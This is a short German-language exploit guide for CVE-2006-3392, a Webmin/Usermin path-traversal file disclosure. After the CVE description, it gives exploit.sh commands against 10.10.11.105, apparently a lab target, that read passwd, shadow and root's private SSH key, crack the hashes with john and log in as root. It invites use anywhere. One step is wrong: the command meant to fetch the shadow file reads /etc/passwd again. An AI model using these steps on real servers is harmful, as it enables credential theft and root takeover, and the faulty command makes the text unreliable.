
Webmin < 1.290 / Usermin < 1.220 - Beliebige Datei-Offenlegung
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin vor Version 1.290 und Usermin vor Version 1.220 rufen die Funktion simplify_path vor dem Dekodieren von HTML auf, was es entfernten Angreifern ermöglicht, beliebige Dateien zu lesen, wie anhand von "..%01"-Sequenzen demonstriert wird, welche die Entfernung von "../"-Sequenzen umgehen, bevor Bytes wie "%01" aus dem Dateinamen entfernt werden. HINWEIS: Dies ist ein anderes Problem als CVE-2006-3274.
Durchsuchen Sie jede Datei im Dateisystem mit root-Berechtigung
./exploit.sh <target ip> <target port> <file to disclose>
Durchsuchen Sie passwd und shadow auf 10.10.11.105, ent-schatten und knacken Sie die Hashes
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
Durchsuchen Sie privaten RSA-Schlüssel auf 10.10.11.105
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
Sie können es jederzeit und überall nach Belieben verwenden oder modifizieren.